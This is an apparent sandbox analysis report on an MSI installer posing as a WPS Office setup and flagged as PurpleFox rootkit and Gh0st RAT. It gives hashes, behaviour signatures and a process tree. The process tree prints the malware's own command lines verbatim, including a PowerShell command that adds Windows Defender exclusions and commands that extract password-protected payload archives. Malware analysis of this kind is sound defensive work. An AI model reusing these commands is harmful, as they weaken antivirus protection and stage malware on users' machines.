Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    15-11-2024 04:28

General

  • Target

    fd6e356f17c7db639084ea710174ed0c4ca6c43cc701525f855f241653d47e2d.msi

  • Size

    242.2MB

  • MD5

    4393f1aeb2effbba1df28ca5057e2182

  • SHA1

    ca2985c1f08350363b1b62756035b2982b787ab6

  • SHA256

    fd6e356f17c7db639084ea710174ed0c4ca6c43cc701525f855f241653d47e2d

  • SHA512

    3e655488342b8be0038049b8193da42481c4c2a868ca613f311095d656539d35f01c865a7cb44eb7227ca1ae1ad5b63199a6ba84644dd26506ce6256638d5ed7

  • SSDEEP

    6291456:oLKBfaA+iLH02im/1aOUiWuXsiHDqzGw4w:oLWfadiL1B/1/UZucfzT4

Malware Config

Signatures

  • Detect PurpleFox Rootkit 4 IoCs

    Detect PurpleFox Rootkit.

  • Gh0st RAT payload 4 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) whose source code is public; it has been used by multiple Chinese groups.

  • Gh0strat family
  • PurpleFox

    PurpleFox is an exploit kit, first seen in 2018, that is used to distribute other malware families.

  • Purplefox family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 23 IoCs
  • Drops file in Windows directory 8 IoCs
  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 20 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of a victim host in order to infer its geographical location.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 22 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\fd6e356f17c7db639084ea710174ed0c4ca6c43cc701525f855f241653d47e2d.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1652
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4048
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:3216
      • C:\Windows\System32\MsiExec.exe
        C:\Windows\System32\MsiExec.exe -Embedding 48A7572FFAA34358BC889E9E71D5B4B1 E Global\MSI0000
        2⤵
        • Drops file in Program Files directory
        • Modifies data under HKEY_USERS
        • Suspicious use of WriteProcessMemory
        PID:2228
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\UpgradeValiantSupervisor','C:\Program Files','C:\Program Files'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5044
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\UpgradeValiantSupervisor\QuKXZsRXURIinRpoBrKGXnAQNKrytv.exe" x "C:\Program Files\UpgradeValiantSupervisor\XKYmrPWFxyBWJVhaoMMkJtrOmLOXqQ" -o"C:\Program Files\UpgradeValiantSupervisor\" -p"216407uRm!g5%as}S}It" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\UpgradeValiantSupervisor\QuKXZsRXURIinRpoBrKGXnAQNKrytv.exe" x "C:\Program Files\UpgradeValiantSupervisor\lZUcUGIkCrHpRcYmglgTBsqAioyfvZ" -x!1_ZhObbZwOavDN.exe -x!sss -x!1_VDHzjIgYYVtDUEXESCkEnfwqxTFttd.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\UpgradeValiantSupervisor\" -p"39895lK3p$:%-WI>c*Z|" -y
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:3012
          • C:\Program Files\UpgradeValiantSupervisor\QuKXZsRXURIinRpoBrKGXnAQNKrytv.exe
            "C:\Program Files\UpgradeValiantSupervisor\QuKXZsRXURIinRpoBrKGXnAQNKrytv.exe" x "C:\Program Files\UpgradeValiantSupervisor\XKYmrPWFxyBWJVhaoMMkJtrOmLOXqQ" -o"C:\Program Files\UpgradeValiantSupervisor\" -p"216407uRm!g5%as}S}It" -y
            4⤵
            • Drops file in Program Files directory
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:632
          • C:\Windows\system32\PING.EXE
            ping 127.0.0.1 -n 2
            4⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:4212
          • C:\Program Files\UpgradeValiantSupervisor\QuKXZsRXURIinRpoBrKGXnAQNKrytv.exe
            "C:\Program Files\UpgradeValiantSupervisor\QuKXZsRXURIinRpoBrKGXnAQNKrytv.exe" x "C:\Program Files\UpgradeValiantSupervisor\lZUcUGIkCrHpRcYmglgTBsqAioyfvZ" -x!1_ZhObbZwOavDN.exe -x!sss -x!1_VDHzjIgYYVtDUEXESCkEnfwqxTFttd.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\UpgradeValiantSupervisor\" -p"39895lK3p$:%-WI>c*Z|" -y
            4⤵
            • Drops file in Program Files directory
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2956
        • C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe
          "C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe" -number 111 -file file3 -mode mode3
          3⤵
          • Drops file in Program Files directory
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1768
        • C:\Program Files\UpgradeValiantSupervisor\WPS_Setup_18608.exe
          "C:\Program Files\UpgradeValiantSupervisor\WPS_Setup_18608.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4752
          • C:\ProgramData\kingsoft\20241115_42958\WPS_Setup_18608.exe
            "C:\ProgramData\kingsoft\20241115_42958\WPS_Setup_18608.exe" /ThemeIndex=#ThemeIndex#
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            PID:3504
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious use of AdjustPrivilegeToken
      PID:1624
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.vbs"
      1⤵
      • Modifies data under HKEY_USERS
      PID:3732
    • C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.exe
      "C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.exe" install
      1⤵
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2904
    • C:\ProgramData\kingsoft\20241115_42958\WPS_Setup_18608.exe
      "C:\ProgramData\kingsoft\20241115_42958\WPS_Setup_18608.exe" -downpower -ThemeIndex="#ThemeIndex#" -msgwndname=wpssetup_message_E581047 -curinstalltemppath=C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\ -msgsmname=Global\_wpssetup_message_sm_DB0
      1⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4860
    • C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.exe
      "C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.exe" start
      1⤵
      • Drops file in Program Files directory
      • Executes dropped EXE
      PID:3548
    • C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.exe
      "C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.exe"
      1⤵
      • Drops file in Program Files directory
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1412
      • C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe
        "C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe" -number 248 -file file3 -mode mode3
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3432
        • C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe
          "C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe" -number 62 -file file3 -mode mode3
          3⤵
          • Enumerates connected drives
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          PID:2676
